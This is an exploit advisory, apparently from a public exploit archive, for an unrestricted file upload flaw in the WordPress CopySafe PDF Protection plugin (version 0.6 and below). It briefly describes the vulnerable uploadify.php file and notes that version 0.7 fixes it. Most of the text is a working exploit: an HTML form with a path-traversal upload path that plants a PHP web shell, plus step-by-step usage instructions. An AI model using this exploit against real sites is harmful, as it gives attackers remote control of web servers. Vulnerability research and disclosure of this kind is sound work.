WordPress CopySafe PDF Protection plugin versions 0.6 and below suffer from a remote shell upload vulnerability.
43d587958f6cbd2b437cc72de392e89b6deef2dd6b31414582cadb949647c033
##################################################################################################
#Exploit Title : Wordpress Plugin CopySafe PDF Protection Shell Upload
vulnerability
#Author : Jagriti Sahu
#Download Link : http://wordpress.org/support/plugin/wp-copysafe-pdf
#version affected : 0.6 and below
#Date : 14/07/2014
#Discovered at : IndiShell Lab
#Love to : Surbhi, Mradula and Harry
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
Wordpress Plugin CopySafe PDF Protection(upto version 0.6) suffers
from unrestricted file upload vulnerability which allow an attacker to
upload malecious php shell on server.
to avaid exploitation , update plugin to version 0.7
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to lib/uploadify/uploadify.php file in which there
is no check during file upload
attacker need to forward file upload request to this file with PHP
shell and file upload path
///////////////////////
/// exploit code ////
///////////////////////
<form
action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="wpcsp_file" ><br>
<input type=text name="upload_path" value="../../../../uploads/">
<input type="submit" name="submit" value="Submit">
</form>
save this code on you machine as exploit.html
open exploit.html into webbrowser, brows your php shell and click
submit button
shell will be uploaded in uploads directory
http://website.com/wp-content/uploads/shell.php